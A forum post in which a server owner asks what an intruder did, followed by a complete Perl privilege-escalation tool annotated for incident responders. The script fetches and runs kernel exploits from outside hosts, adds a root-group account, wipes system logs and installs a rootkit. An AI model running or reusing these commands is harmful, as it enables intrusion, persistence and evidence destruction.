I didn't get any help from my host. I will check the user upload form.
Can you tell me, from this code, what he has tried to do (or has done) on my server?
PHP Code:
#!/usr/bin/perl -w
# No arguments: print the tool's menu and exit; nothing else runs on this path.
# NOTE(review): the menu is not a reliable map of the code below. It lists
# "-r" (add root account) and "-t" (rootkit), but no branch tests "-r", both
# "-t" branches do other things, and the rootkit branch is "-v4". The "-k",
# "-d", "-c" and "-v4" branches are not listed at all. Judge impact from the
# branches, not from this text.
# For responders: the banner strings ("rOot Toolz", "ro0tget.pl") are handy
# search terms when hunting for other copies in web-writable directories.
if(@ARGV < 1){
print q (
#=============[ rOot Toolz ]=============#
| uid=0(root) gid=0(root) groups=0(root) |
| Get|rOot v1.0 |
| Use : perl ro0tget.pl -1 |
| THNK 2 : SarBoT511 SadHacKer SiLver.47 |
| i-Hmx The injector Z1d No-QrQr Fox HaC |
#=============[ Local root ]=============#
| Local root 2010 FreeBsD -7 |
| Local root aLL Exploit -8 |
| Local Root Privilege Escalation -9 |
#=============[ after root ]=============#
| More about GeT rOoT version 1.0 -ab |
| Help My i need help -he |
#========================================#
#============[ Local root ]==============#
| uid=0(root) gid=0(root) groups=0(root)|
| Local root 2010 x86_64 2.6.18-194 -1 |
| Local root 2009 i686 2.6.18-128 -2 |
| Local root 2008 2.6.18 -3 |
| Local root 2007 x86_64 2.6.22-6 -4 |
| all Local root -5 |
#============[ after root ]==============#
| Add root Account -r |
| add rootkit v4-team -t |
| rm -rf Log -rm |
#============[ about ]==============#
| GeT rOoT By Or4nG.M4n version 1.0 |
| priv8te [ @ ] Hotmail [ . ] com |
#========================================#
sec4ever.com | v4-team.com
);
exit;
}
# Branch "-t" (first of two: the account-creation block further down tests the
# same pattern, so a single "-t" run executes both).
# The test is an unanchored pattern match, so any first argument that merely
# contains "-t" reaches this code.
if ($ARGV[0] =~ "-t" )
{
print "add Shell tools [ t ]\n";
# The URL is cut off after "http" in this copy, so what was fetched (if
# anything) cannot be determined from the listing.
system "wget http";
# Sets the setuid/setgid bits on /usr/bin/cat. This only takes effect if the
# script is already running as the file's owner (normally root). If it did,
# any local user can read root-only files through cat.
# For responders: check `ls -l /usr/bin/cat` and audit the host for other
# unexpected setuid/setgid binaries.
system "cd /usr/bin;chmod +s cat";
sleep(2);
print "\tcompleted .. \n\n";
}
# Branch "-1": downloads a prebuilt file "Localz-1" from trav1an.t35.com into
# the current working directory, makes it world read/write/executable and runs
# it. The payload is not part of this listing; the label printed below is the
# only indication of which kernel it is aimed at.
# For responders: look for Localz-1 in the directory the script ran from and
# for requests to that host in proxy/DNS/firewall logs.
if ($ARGV[0] =~ "-1" )
{
print "Local root 2010 x86_64 2.6.18-194 [ 1 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-1";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-1";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-1";
print "\tcompleted .. \n\n";
# Prints kernel version, working directory and current ids, then calls su.
# NOTE(review): presumably the operator's check for whether uid 0 was obtained.
system "uname -a;pwd;id;su";
}
# Branch "-2": same download / chmod 777 / execute sequence as the other
# numbered branches, for a file named "Localz-2" from trav1an.t35.com. The
# payload is not shown here; only the printed label hints at its target.
# For responders: look for Localz-2 in the directory the script ran from.
if ($ARGV[0] =~ "-2" )
{
print "Local root 2009 i686 2.6.18-128 [ 2 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-2";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-2";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-2";
print "\tcompleted .. \n\n";
# Prints kernel version, working directory and current ids, then calls su.
system "uname -a;pwd;id;su";
}
# Branch "-3": same download / chmod 777 / execute sequence, for a file named
# "Localz-3" from trav1an.t35.com. The payload is not shown in this listing.
# For responders: look for Localz-3 in the directory the script ran from.
if ($ARGV[0] =~ "-3" )
{
print "Local root 2008 i686 2.6.18 [ 3 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-3";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-3";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-3";
print "\tcompleted .. \n\n";
# Prints kernel version, working directory and current ids, then calls su.
system "uname -a;pwd;id;su";
}
# Branch "-4": same download / chmod 777 / execute sequence, for a file named
# "Localz-4" from trav1an.t35.com. The payload is not shown in this listing.
# For responders: look for Localz-4 in the directory the script ran from.
if ($ARGV[0] =~ "-4" )
{
print "Local root 2007 x86_64 2.6.22-6 [ 4 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-4";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-4";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-4";
print "\tcompleted .. \n\n";
# Prints kernel version, working directory and current ids, then calls su.
system "uname -a;pwd;id;su";
}
# Branch "-7": download-only. Fetches three files (loc4l, bsdlocal,
# FreeBSDmaster.passwd.c) and makes each world read/write/executable; nothing
# is compiled or executed by this branch.
# For responders: the presence of these file names shows the branch ran, but
# says nothing about whether the files were later run by hand.
if ($ARGV[0] =~ "-7" )
{
print "Local root 2010 FreeBsD [ bsd ]\n";
system "wget http://trav1an.t35.com/Localz/all/loc4l";
system "chmod 777 loc4l";
system "wget http://trav1an.t35.com/Localz/all/bsdlocal";
system "chmod 777 bsdlocal";
system "wget http://trav1an.t35.com/Localz/all/FreeBSDmaster.passwd.c";
system "chmod 777 FreeBSDmaster.passwd.c";
}
# Branch "-8": download-only. Fetches five files named after kernel versions
# (two of them C sources) and makes each world read/write/executable; nothing
# is compiled or executed by this branch.
# For responders: these file names in the script's working directory are
# staging artifacts; check shell history and process accounting, if available,
# for later manual execution.
if ($ARGV[0] =~ "-8" )
{
print "Local root aLL Exploit [ pri ]\n";
system "wget http://trav1an.t35.com/Localz/all/2.4.20";
system "chmod 777 2.4.20";
system "wget http://trav1an.t35.com/Localz/all/2.4.29";
system "chmod 777 2.4.29";
system "wget http://trav1an.t35.com/Localz/all/2.4.34";
system "chmod 777 2.4.34";
system "wget http://trav1an.t35.com/Localz/all/2.6.8.c";
system "chmod 777 2.6.8.c";
system "wget http://trav1an.t35.com/Localz/all/2.6.6-34.c";
system "chmod 777 2.6.6-34.c";
print "\tcompleted .. \n\n";
print "\t ok now you can tray any Local";
}
# Branch "-9": the only branch that downloads nothing. It writes a file
# "exploit.conf" in the current directory and runs SystemTap's staprun with
# MODPROBE_OPTIONS pointing at that file.
# NOTE(review): this looks like an attempt to abuse how a privileged staprun
# passes its environment to modprobe -- confirm against the systemtap version
# installed on the host.
# For responders: an exploit.conf containing "install uprobes /bin/sh" is the
# artifact. If systemtap is not needed, removing it (or the setuid bit on
# staprun) closes this path; otherwise make sure the package is up to date.
if ($ARGV[0] =~ "-9" )
{
print "Local Root Privilege Escalation [ xpl ]\n";
system "pwd";
system 'printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever';
sleep(2);
print "\tcompleted .. \n\n";
system "uname -a;su;id";
}
# Branch "-5": a long "try everything" chain. For each entry it downloads a
# file into the current working directory, makes it world read/write/
# executable, runs it, and prints the current ids with `id`; the operator is
# told to interrupt the script once `id` shows root. Some entries are C sources
# that are compiled on the host with gcc first. None of the payloads are part
# of this listing.
# NOTE(review): the download paths (/modules/, /templates/beez/, /adsense/cc/)
# look like directories on third-party websites, presumably sites that were
# themselves compromised and used for staging -- do not assume the domains
# belong to the attacker.
# For responders: the file names on the wget, chmod and execute lines do not
# always agree, so treat every name that appears on any of these lines as a
# possible on-disk artifact. Useful hardening against this whole pattern:
# mount upload and temp directories noexec, keep compilers and download tools
# away from the web server account, and keep the kernel patched.
if ($ARGV[0] =~ "-5" )
{
# Staging host 1: clearwatercottages.com
system("wget http://www.clearwatercottages.com/modules/2010-1");
system("chmod 777 2010-1");
system("./2010-1");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/2010-2");
system("chmod 777 2010-2");
system("./2010-2");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/linux-rds-exploit");
system("chmod 777 linux-rds-exploit");
system("./linux-rds-exploit");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/i-can-haz-modharden");
system("chmod 777 i-can-haz-modharden");
system("./i-can-haz-modharden");
system("id;whoami");
# Staging host 2: solarens.com
system("wget http://www.solarens.com/templates/beez/2.6.34-2011");
system("chmod 777 2.6.34-2011");
system("./2.6.34-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
# Staging host 3: schoolbd.com (everything from here to the end of the branch)
system("wget http://www.schoolbd.com/adsense/cc/iskorpitx");
system("chmod 777 iskorpitx");
system("./iskorpitx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/c");
system("chmod 777 c");
system("./c");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/d");
system("chmod 777 d");
system("./d");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://www.schoolbd.com/adsense/cc/9521");
system("chmod 777 9521");
system("./9521");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/run97");
system("chmod 777 run97");
system("./97");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/froot");
system("chmod 777 froot");
system("./froot");
system("id");
system("id");
system("id");
system("id");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
# First entry that is built on the host: one C source compiled twice with gcc
# (the second time with -m64) into 18-1 and 18-3.
system("wget http://www.schoolbd.com/adsense/cc/18-1.c");
system("gcc -Wall -o 18-1 18-1.c");
system("gcc -Wall -m64 -o 18-3 18-1.c");
system("chmod 777 18-1");
system("chmod 777 18-3");
system("./18-1");
system("id");
system("./18-3");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-2");
system("chmod 777 18-2");
system("./18-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-3");
system("chmod 777 18-3");
system("./18-3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit2");
system("chmod 777 exploit2");
system("./exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009-1");
system("chmod 777 2009-1");
system("./2009-1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/3.c");
system("gcc 3.c -o 3");
system("chmod 777 3");
system("./3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/3a");
system("chmod 777 3a");
system("./3a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/4.c");
system("gcc 4.c -o 4");
system("chmod 777 4");
system("./4");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/4a");
system("chmod 777 4a");
system("./4a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/cx.c");
system("gcc cx.c -o cx");
system("chmod 777 cx");
system("./cx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/cxx.c");
system("gcc cxx.c -o cxx");
system("chmod 777 cxx");
system("./cxx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit2");
system("chmod 777 exploit2");
system("./exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/run");
system("chmod 777 run");
system("./run");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/rootsh.c");
system("gcc rootsh.c -o rootsh");
system("chmod 777 rootsh");
system("./rootsh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/29.c");
system("gcc 29.c -o 29");
system("chmod 777 29");
system("./29");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/30");
system("chmod 777 30");
system("./30");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009");
system("chmod 777 2009");
system("./2009");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/05");
system("chmod 777 05");
system("./05");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/isko");
system("chmod 777 isko");
system("./isko");
system("id");
system("./isko");
system("isko");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18");
system("chmod 777 18");
system("./18");
system("id");
system("./18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/7");
system("chmod 777 7");
system("./7");
system("id");
system("./7");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
system("./7-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8");
system("chmod 777 8");
system("./8");
system("id");
system("./8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8a");
system("chmod 777 8a");
system("./8a");
system("id");
system("./8a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8bb");
system("chmod 777 8bb");
system("./8bb");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8cc");
system("chmod 777 8cc");
system("./8cc");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8x");
system("chmod 777 8x");
system("./8x");
system("id");
system("./8x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2008");
system("chmod 777 2008");
system("./2008");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id"); ;
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009xx");
system("chmod 777 2009xx");
system("./2009xx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8");
system("chmod 777 2.6.9-55-2007-prv8");
system("./2.6.9-55-2007-prv8");
system("id");
system("./2.6.9-55-2007-prv8");
system("id");
system("./2.6.9-55-2007-prv8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
print "If u malesef rootlayamadin baska serverlerde mutlaka ama mutlaka:)by iskorpitx - Edit BY nO lOv3 \n";
}
# Branch "-k" (not listed in the menu): downloads files from
# grsecurity.net/~spender, dazzlestudio.net and alexoloughlinsplace.com,
# compiles the ones fetched as source with gcc, runs each result and then
# prints `uname -a;pwd;id` and calls su.
# The label printed first is the same text as the "-2" branch prints and does
# not describe what this branch fetches.
# NOTE(review): names such as 64bit_dos and crashvmlinuz suggest some of these
# are crash/denial-of-service tools rather than privilege escalation; confirm
# from the files if they can be recovered. An unexplained crash or reboot
# around the time of the intrusion would be consistent with this branch.
# NOTE(review): the first host looks like a researcher's public page rather
# than attacker infrastructure; a request to it is evidence of the script
# running, not of that site being malicious.
if ($ARGV[0] =~ "-k" )
{
print "Local root 2009 i686 2.6.18-128 [ 2 ]\n";
system "wget http://grsecurity.net/~spender/64bit_dos.c";
sleep(2);
system("gcc 64bit_dos.c -o 64bit_dos");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 64bit_dos";
sleep(2);
print "\tcompleted .. \n\n";
system "./64bit_dos";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/exploit.txt";
sleep(2);
system("gcc exploit.txt -o exploitcc");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 exploitcc";
sleep(2);
print "\tcompleted .. \n\n";
system "./exploitcc";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/grlogalert.c";
sleep(2);
system("gcc grlogalert.c -o grlogalert");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 grlogalert";
sleep(2);
print "\tcompleted .. \n\n";
system "./grlogalert";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/vmlinuz_to_vmlinux_gz.c";
sleep(2);
system("gcc vmlinuz_to_vmlinux_gz.c -o vmlinuz_to_vmlinux_gz");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 vmlinuz_to_vmlinux_gz";
sleep(2);
print "\tcompleted .. \n\n";
system "./vmlinuz_to_vmlinux_gz";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
# From here on the files are fetched prebuilt (no gcc step).
system "wget http://grsecurity.net/~spender/crashvmlinuz";
print "\tcompleted .. \n\n";
system "chmod 777 crashvmlinuz";
sleep(2);
print "\tcompleted .. \n\n";
system "./crashvmlinuz";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://dazzlestudio.net/2.6.18-164";
print "\tcompleted .. \n\n";
system "chmod 777 2.6.18-164";
sleep(2);
print "\tcompleted .. \n\n";
system "./2.6.18-164";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://alexoloughlinsplace.com/forum/NewDir/z1d-2011";
print "\tcompleted .. \n\n";
system "chmod 777 z1d-2011";
sleep(2);
print "\tcompleted .. \n\n";
system "./z1d-2011";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
# Branch "-ab": prints a site name and does nothing else; no effect on the host.
if ($ARGV[0] =~ "-ab" )
{
print q (
sec4ever.com
);
}
# Branch "-t" (second of two; the menu calls this "-r", but the code tests
# "-t", so it runs together with the setuid-cat block near the top).
# Tries to create a persistent account: user "roor", primary group 0,
# supplementary groups wheel,sys,bin,daemon,adm,disk, home directory /sf7,
# shell /bin/sh. This only succeeds if the script is already running as root.
# For responders: check /etc/passwd, /etc/shadow and /etc/group for "roor",
# for any unexpected account with gid 0 or membership in those groups, and for
# a /sf7 directory. Compare against backups rather than trusting the live files.
if ($ARGV[0] =~ "-t" )
{
print "Add Root Account [ r ]\n";
print "user : [ roor ]\n";
system "adduser -g 0 roor -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh";
# passwd is invoked with "r0otH4x0r" as its argument, which passwd treats as
# an account name. Verify the real state of both names in /etc/passwd and
# /etc/shadow instead of relying on the message printed below.
system "passwd r0otH4x0r";
print "pass is : r0otH4x0r\n";
sleep(2);
}
# Branch "-d" (not listed in the menu): another download / chmod 777 /
# execute / `id` chain, this time for prebuilt files under
# pjk.danawa.my/templates/beez/. The payloads are not part of this listing;
# their names only hint at the kernel versions they are aimed at.
# NOTE(review): the /templates/beez/ path looks like a CMS template directory
# on a third-party site, presumably compromised and used for staging.
# For responders: the file names on the wget, chmod and execute lines do not
# always agree, so treat every name on any of these lines as a possible
# artifact in the script's working directory.
if ($ARGV[0] =~ "-d" )
{
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18.2010");
system("chmod 777 priv8-2.6.18.2010");
system("./priv8-2.6.18.2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18-164-2010");
system("chmod 777 priv8-2.6.18-164-2010");
system("./priv8-2.6.18-164-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2");
system("chmod 777 2");
system("./2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/1");
system("chmod 777 1");
system("./1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.32-21-generic-2010-i686");
system("chmod 777 2.6.32-21-generic-2010-i686");
system("./2.6.32-21-generic-2010-i686");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");
system("chmod 777 2.6.18-53");
system("./2.6.18-53");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");
system("chmod 777 2.6.30");
system("./2.6.18-53");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
}
# Branch "-c" (not listed in the menu): downloads an archive
# "enlightenment.tgz" from rbht.pp.ru, unpacks it, edits a file named
# exploit.c with sed, and calls a script named run_null_exploits.sh. The
# archive contents are not part of this listing.
# NOTE(review): the script name suggests kernel NULL-pointer-dereference
# exploits; confirm from the archive if it can be recovered.
# For responders: look for enlightenment.tgz and an enlightenment/ directory
# where the script ran. Every command here is passed to system(), including
# the status text near the end, so shell "command not found" errors in
# captured output can also mark this branch.
if ($ARGV[0] =~ "-c" )
{
system "wget http://rbht.pp.ru/files/enlightenment.tgz";
sleep(2);
system "tar xzf enlightenment.tgz";
sleep(2);
system "cd enlightenment";
# In-place sed edit that deletes matching lines from exploit.c.
system "sed -i '/turn_\(on\|off\)_wp();/d' exploit.c";
sleep(2);
system "./run_null_exploits.sh";
sleep(2);
system "id";
system "id";
system "If u r r00t stop xpl with ctrl+c\n";
system "uname -a;su;id";
}
# Branch "-rm": anti-forensics. Recursively deletes system and Apache log
# directories, login accounting files (utmp/wtmp) and root's shell history.
# Most of these paths are writable only by root, so missing logs on the host
# are a strong sign that the attacker had root when this ran.
# For responders: if /var/log, /var/adm or the Apache log directories are gone
# or freshly recreated, rely on off-host copies (remote syslog, backups,
# provider-side logs) for the timeline. Forwarding logs off the machine is the
# mitigation that survives this step.
if ($ARGV[0] =~ "-rm" )
{
print "rm -rf Log [ rm ] \n";
system "rm -rf /tmp/logs";
system "rm -rf /root/.ksh_history";
system "rm -rf /root/.bash_history";
system "rm -rf /root/.bash_logout";
system "rm -rf /usr/local/apache/logs";
sleep(2);
system "rm -rf /usr/local/apache/log";
system "rm -rf /var/apache/logs";
system "rm -rf /var/apache/log";
system "rm -rf /var/run/utmp";
system "rm -rf /var/logs";
system "rm -rf /var/log";
sleep(2);
system "rm -rf /var/adm";
system "rm -rf /etc/wtmp";
system "rm -rf /etc/utmp";
system "cd /bin";
print "\tcompleted .. \n\n";
}
# Branch "-v4" (the menu lists the rootkit under "-t"): downloads
# v4team-rootkit.tar.gz from trav1an.t35.com, unpacks it and runs
# rootkit/install. The installer is not part of this listing, so what it
# changes on the host cannot be read from here.
# NOTE(review): the credentials printed below suggest the installer sets up a
# backdoor login under that name -- confirm on the host.
# For responders: look for the tarball and a rootkit/ directory, and for the
# printed user name in /etc/passwd. If the installer ran as root, system
# binaries can no longer be trusted; inspect from known-good media and plan to
# rebuild the host rather than clean it.
if ($ARGV[0] =~ "-v4" )
{
print "Add v4-team Rootkit [ v4 ]\n";
system "wget http://trav1an.t35.com/v4team-rootkit.tar.gz";
system "tar -xvvzf v4team-rootkit.tar.gz";
system "cd rootkit;./install";
print "user : wo7oshv4team , pass : v4teamhacker \n";
system "id";
print "\tcompleted .. \n\n";
}
# Branch "-he": prints a one-line usage hint and does nothing else; no effect
# on the host.
if ($ARGV[0] =~ "-he" )
{
print q (
| Use : perl ro0tget.pl -1 |
);
}